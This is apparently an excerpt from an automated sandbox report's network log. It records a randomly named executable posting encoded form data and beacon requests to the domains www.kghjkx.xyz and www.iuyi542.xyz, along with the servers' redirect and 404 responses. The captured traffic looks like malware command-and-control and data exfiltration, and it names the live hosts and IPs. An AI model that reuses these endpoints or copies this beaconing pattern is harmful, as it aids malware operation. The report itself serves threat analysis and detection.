                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:31.599441051 CET | 717 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: openresty/1.25.3.2
                                                                                      Date: Wed, 13 Nov 2024 08:28:31 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 561
                                                                                      Connection: close
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 35 2e 33 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 [TRUNCATED]
                                                                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.25.3.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      29 | 192.168.2.4 | 59110 | 47.129.103.185 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:37.267333984 CET | 780 | OUT | POST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 6d 4d 54 34 47 57 6d 5a 37 31 55 6e 4d 71 42 51 33 4c 5a 51 35 41 5a 36 7a 4f 5a 61 4b 6e 30 53 2f 51 63 62 50 6e 61 52 51 46 4f 75 54 39 48 46 75 57 35 39 73 53 65 74 6c 4a 72 6b 30 49 50 4d 73 48 63 44 30 41 78 4f 6c 45 66 42 73 4f 4c 57 79 35 69 74 55 77 57 2b 2f 74 32 4c 57 59 2b 67 65 31 75 61 75 68 63 31 76 4d 42 55 39 75 38 36 47 39 6d 72 4e 79 68 4d 45 5a 64 38 47 65 30 64 53 37 64 31 46 6b 43 6c 2b 52 65 5a 39 6a 34 41 48 41 64 44 43 45 6e 61 58 38 6a 68 50 6c 4e 4a 4a 51 47 55 2b 7a 54 73 32 53 61 56 47 71 76 2b 54 73 6e 2f 77 3d 3d
                                                                                      Data Ascii: rP=6Ez30ZWXMUnDmmMT4GWmZ71UnMqBQ3LZQ5AZ6zOZaKn0S/QcbPnaRQFOuT9HFuW59sSetlJrk0IPMsHcD0AxOlEfBsOLWy5itUwW+/t2LWY+ge1uauhc1vMBU9u86G9mrNyhMEZd8Ge0dS7d1FkCl+ReZ9j4AHAdDCEnaX8jhPlNJJQGU+zTs2SaVGqv+Tsn/w==
                                                                                      Nov 13, 2024 09:28:38.252922058 CET | 398 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:38 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      30 | 192.168.2.4 | 59111 | 47.129.103.185 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:39.799820900 CET | 800 | OUT | POST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 219
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 33 30 53 66 67 63 61 4c 4c 61 63 77 46 4f 68 7a 39 47 47 65 57 79 39 74 76 68 74 6e 64 72 6b 30 63 50 4d 70 37 63 66 54 55 2b 50 31 45 64 4f 4d 4f 4a 63 53 35 69 74 55 77 57 2b 2f 35 63 4c 57 77 2b 67 72 6c 75 61 4c 56 66 32 76 4d 43 54 39 75 38 72 32 39 59 72 4e 79 50 4d 42 6c 37 38 44 61 30 64 53 72 64 30 55 6b 42 76 2b 52 45 47 74 69 49 54 47 70 5a 4b 68 56 75 62 6d 6f 2b 2b 72 51 72 42 76 64 63 46 50 53 45 2b 32 32 70 49 42 6a 62 7a 51 52 75 6b 36 31 36 4e 64 42 66 44 58 57 55 45 44 6e 66 68 6d 58 6c 7a 75 6f 3d
                                                                                      Data Ascii: rP=6Ez30ZWXMUnDmGcT0FOmQ71TosqBaXLdQ48Z62vcac30SfgcaLLacwFOhz9GGeWy9tvhtndrk0cPMp7cfTU+P1EdOMOJcS5itUwW+/5cLWw+grluaLVf2vMCT9u8r29YrNyPMBl78Da0dSrd0UkBv+REGtiITGpZKhVubmo++rQrBvdcFPSE+22pIBjbzQRuk616NdBfDXWUEDnfhmXlzuo=
                                                                                      Nov 13, 2024 09:28:40.792073965 CET | 398 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:40 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      31 | 192.168.2.4 | 59112 | 47.129.103.185 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:42.330967903 CET | 10882 | OUT | POST /usop/ HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.kghjkx.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 10299
                                                                                      Referer: http://www.kghjkx.xyz/usop/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 36 45 7a 33 30 5a 57 58 4d 55 6e 44 6d 47 63 54 30 46 4f 6d 51 37 31 54 6f 73 71 42 61 58 4c 64 51 34 38 5a 36 32 76 63 61 63 2f 30 53 75 41 63 56 4b 4c 61 54 51 46 4f 6f 54 39 62 47 65 57 76 39 74 32 6f 74 6e 51 65 6b 79 51 50 65 62 44 63 54 79 55 2b 45 31 45 64 46 73 4f 4b 57 79 34 36 74 55 67 53 2b 2f 70 63 4c 57 77 2b 67 73 64 75 64 65 68 66 36 50 4d 42 55 39 75 77 36 47 39 6a 72 4a 65 35 4d 41 52 4e 37 33 75 30 45 7a 62 64 33 6d 38 42 6e 2b 52 61 46 74 69 51 54 47 31 57 4b 6e 78 49 62 6d 63 45 2b 73 34 72 43 4a 52 4b 41 75 43 2b 6e 46 69 45 56 43 62 34 79 67 45 6f 6a 59 56 47 63 39 35 46 58 44 6a 35 50 54 57 33 2b 58 4c 6c 6e 62 64 67 49 43 30 71 46 32 77 7a 6d 31 51 30 32 53 46 52 36 39 54 38 63 58 47 5a 61 75 6d 6c 6c 73 33 47 74 47 42 4e 63 4b 39 52 49 5a 4c 4c 39 48 6a 35 50 2b 36 5a 6f 6d 57 41 79 4b 78 5a 38 4b 65 7a 64 43 57 54 51 6f 51 42 79 4d 41 43 69 33 48 36 47 4f 6a 7a 79 49 43 59 79 6e 33 33 6f 43 46 70 43 57 4c 79 35 74 54 6a 6d 45 33 68 69 66 4a 76 78 39 5a 38 50 41 56 [TRUNCATED]
                                                                                      Nov 13, 2024 09:28:43.362481117 CET | 398 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:43 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      32 | 192.168.2.4 | 59113 | 47.129.103.185 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:44.866463900 CET | 524 | OUT | GET /usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql HTTP/1.1
                                                                                      Host: www.kghjkx.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Nov 13, 2024 09:28:45.854818106 CET | 542 | IN | HTTP/1.1 301 Moved Permanently
                                                                                      Server: nginx
                                                                                      Date: Wed, 13 Nov 2024 08:28:45 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 162
                                                                                      Connection: close
                                                                                      Location: https://www.kghjkx.xyz/usop/?rP=3GbX3siKa3fb4xoywiCreKN2vNnbaQz6Sbk2xDjabsziN9g8eu79RDllgCpODOeJxsPok1tislweMq7jEyJ1HksFPNjAfzJjuFgq98sTQGUllsVyDZpLjNQ=&2p2h=vzYT2lDhJTZ0Ql
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      33 | 192.168.2.4 | 59114 | 38.47.237.27 | 80 | 2800 | C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Nov 13, 2024 09:28:51.137970924 CET | 783 | OUT | POST /cymd/ HTTP/1.1
                                                                                      Host: www.iuyi542.xyz
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Origin: http://www.iuyi542.xyz
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Cache-Control: no-cache
                                                                                      Connection: close
                                                                                      Content-Length: 199
                                                                                      Referer: http://www.iuyi542.xyz/cymd/
                                                                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                                                      Data Raw: 72 50 3d 66 53 35 35 43 43 33 45 68 38 76 66 37 51 50 78 34 56 75 37 59 78 76 74 59 68 56 54 6f 47 51 6b 54 46 30 44 66 78 77 37 45 2b 33 74 65 35 33 70 46 31 48 45 4c 59 43 74 58 67 67 4e 77 67 70 46 54 59 6c 49 38 6d 56 32 4b 33 4b 4e 41 32 45 7a 57 5a 73 64 6a 6b 79 6d 58 50 51 42 63 4e 73 46 47 52 41 67 55 6c 48 35 72 58 63 68 41 30 54 79 63 6a 62 44 67 48 44 39 52 4f 4d 65 45 45 59 5a 39 6e 47 38 33 56 74 70 46 51 48 59 45 45 69 4f 44 6e 2b 4a 68 6a 33 69 6b 6b 69 30 74 6e 73 32 4d 61 71 79 4c 70 6c 68 4d 4b 6a 36 33 44 7a 61 52 58 63 41 4f 69 47 70 38 79 72 4f 68 71 66 6f 6c 41 3d 3d
Data Ascii: rP=fS55CC3Eh8vf7QPx4Vu7YxvtYhVToGQkTF0Dfxw7E+3te53pF1HELYCtXggNwgpFTYlI8mV2K3KNA2EzWZsdjkymXPQBcNsFGRAgUlH5rXchA0TycjbDgHD9ROMeEEYZ9nG83VtpFQHYEEiODn+Jhj3ikki0tns2MaqyLplhMKj63DzaRXcAOiGp8yrOhqfolA==
Nov 13, 2024 09:28:51.797152996 CET | 170 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:28:51 GMT
Content-Type: text/html
Content-Length: 167433
Connection: close
ETag: "652641ca-28e09"


Session ID: 34
Source IP: 192.168.2.4
Source Port: 59115
Destination IP: 38.47.237.27
Destination Port: 80
PID: 2800
Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:28:53.691234112 CET | 803 | OUT | POST /cymd/ HTTP/1.1
Host: www.iuyi542.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.iuyi542.xyz
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 219
Referer: http://www.iuyi542.xyz/cymd/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Data Ascii: rP=fS55CC3Eh8vf6x/xjya7PBviXBVTxWQgTF4Dfw0rEsDteZHpE0HEIYCtPQgE0goJTYhq8kR2KziNA2UzWqUesUykcvQ5C9sFGRAgUlTfrW4hAkjydBjCm3DybuMeW0YV9nGe3UhPFS/YEBOOD2+Wrj2nqEj08kJcUbj6UIpuP5327l+AAm9Xciiah1i6spih+NAE7eHqchysFOKWV62Sf8w=
Nov 13, 2024 09:28:54.330128908 CET | 170 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:28:54 GMT
Content-Type: text/html
Content-Length: 167433
Connection: close
ETag: "652641ca-28e09"


Session ID: 35
Source IP: 192.168.2.4
Source Port: 59116
Destination IP: 38.47.237.27
Destination Port: 80
PID: 2800
Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:28:56.243518114 CET | 10885 | OUT | POST /cymd/ HTTP/1.1
Host: www.iuyi542.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Origin: http://www.iuyi542.xyz
Content-Type: application/x-www-form-urlencoded
Cache-Control: no-cache
Connection: close
Content-Length: 10299
Referer: http://www.iuyi542.xyz/cymd/
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:28:56.905841112 CET | 170 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:28:56 GMT
Content-Type: text/html
Content-Length: 167433
Connection: close
ETag: "652641ca-28e09"


Session ID: 36
Source IP: 192.168.2.4
Source Port: 59117
Destination IP: 38.47.237.27
Destination Port: 80
PID: 2800
Process: C:\Program Files (x86)\ZDzKImrlLPMvodDPvxjyrMHEPJpKdxrInEIKHbnDvOJTkJNHLcVIsvibgfltVMSGrNa\BLUymyzgBTyhbo.exe
Timestamp | Bytes transferred | Direction | Data
Nov 13, 2024 09:28:58.799527884 CET | 525 | OUT | GET /cymd/?2p2h=vzYT2lDhJTZ0Ql&rP=SQRZB1HP1/e+i1vXk12pUULDRytIn3wFTHYuRC8KH5mDKLD+AhmaNIKBelYQ6UpcdOsF2Uw9L0OACGIyKZ1sjmu2WbkhaOw9WSlER16P5D40fVfxJRSv6AQ= HTTP/1.1
Host: www.iuyi542.xyz
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US,en;q=0.5
Connection: close
User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A1040 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
Nov 13, 2024 09:28:59.451735020 CET | 170 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 13 Nov 2024 08:28:59 GMT
Content-Type: text/html
Content-Length: 167433
Connection: close
ETag: "652641ca-28e09"
                                                                                      Nov 13, 2024 09:28:59.451761961 CET1236INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 43 6f 64 65 50 65 6e 20 2d 20 34 30 34 20 50 61 67 65 3c
                                                                                      Data Ascii: <html lang="en"><head> <meta charset="UTF-8"> <title>CodePen - 404 Page</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style>button,hr,input{overflow:visible}audio,canvas,progress,video{dis
                                                                                      Nov 13, 2024 09:28:59.451769114 CET212INData Raw: 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 35 3b 6d 61 72 67 69 6e 3a 30 7d 62 75 74 74 6f 6e 2c 69 6e 70 75 74 7b 7d 62 75 74 74 6f 6e 2c 73 65 6c 65 63 74 7b 74 65 78 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 6e 6f 6e 65 7d 5b 74 79 70 65 3d 73 75 62 6d
                                                                                      Data Ascii: ne-height:1.15;margin:0}button,input{}button,select{text-transform:none}[type=submit], [type=reset],button,html [type=button]{-webkit-appearance:button}[type=button]::-moz-focus-inner,[type=reset]::-moz-focus-inn
                                                                                      Nov 13, 2024 09:28:59.451781034 CET1236INData Raw: 65 72 2c 5b 74 79 70 65 3d 73 75 62 6d 69 74 5d 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 2c 62 75 74 74 6f 6e 3a 3a 2d 6d 6f 7a 2d 66 6f 63 75 73 2d 69 6e 6e 65 72 7b 62 6f 72 64 65 72 2d 73 74 79 6c 65 3a 6e 6f 6e 65 3b 70 61 64 64
                                                                                      Data Ascii: er,[type=submit]::-moz-focus-inner,button::-moz-focus-inner{border-style:none;padding:0}[type=button]:-moz-focusring,[type=reset]:-moz-focusring,[type=submit]:-moz-focusring,button:-moz-focusring{outline:ButtonText dotted 1px}fieldset{border:1
                                                                                      Nov 13, 2024 09:28:59.451860905 CET212INData Raw: 3b 2d 2d 6f 72 61 6e 67 65 3a 23 66 64 37 65 31 34 3b 2d 2d 79 65 6c 6c 6f 77 3a 23 66 66 63 31 30 37 3b 2d 2d 67 72 65 65 6e 3a 23 32 38 61 37 34 35 3b 2d 2d 74 65 61 6c 3a 23 32 30 63 39 39 37 3b 2d 2d 63 79 61 6e 3a 23 31 37 61 32 62 38 3b 2d
                                                                                      Data Ascii: ;--orange:#fd7e14;--yellow:#ffc107;--green:#28a745;--teal:#20c997;--cyan:#17a2b8;--white:#fff;--gray:#6c757d;--gray-dark:#343a40;--primary:#007bff;--secondary:#6c757d;--success:#28a745;--info:#17a2b8;--warning:#f
                                                                                      Nov 13, 2024 09:28:59.451867104 CET1236INData Raw: 66 63 31 30 37 3b 2d 2d 64 61 6e 67 65 72 3a 23 64 63 33 35 34 35 3b 2d 2d 6c 69 67 68 74 3a 23 66 38 66 39 66 61 3b 2d 2d 64 61 72 6b 3a 23 33 34 33 61 34 30 3b 2d 2d 62 72 65 61 6b 70 6f 69 6e 74 2d 78 73 3a 30 3b 2d 2d 62 72 65 61 6b 70 6f 69
                                                                                      Data Ascii: fc107;--danger:#dc3545;--light:#f8f9fa;--dark:#343a40;--breakpoint-xs:0;--breakpoint-sm:576px;--breakpoint-md:768px;--breakpoint-lg:992px;--breakpoint-xl:1200px;--font-family-sans-serif:-apple-system,BlinkMacSystemFont,"Segoe UI",Roboto,"Helve
                                                                                      Nov 13, 2024 09:28:59.451941967 CET212INData Raw: 65 6d 7d 61 62 62 72 5b 64 61 74 61 2d 6f 72 69 67 69 6e 61 6c 2d 74 69 74 6c 65 5d 2c 61 62 62 72 5b 74 69 74 6c 65 5d 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 3b 2d 77 65 62 6b 69 74 2d 74 65 78 74 2d 64 65
                                                                                      Data Ascii: em}abbr[data-original-title],abbr[title]{text-decoration:underline;-webkit-text-decoration:underline dotted;text-decoration:underline dotted;cursor:help;border-bottom:0}address{margin-bottom:1rem;font-style:norma
                                                                                      Nov 13, 2024 09:28:59.451961040 CET1236INData Raw: 6c 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 69 6e 68 65 72 69 74 7d 64 6c 2c 6f 6c 2c 75 6c 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 6f 6c 20 6f 6c 2c 6f 6c 20 75 6c 2c 75 6c 20 6f 6c 2c 75
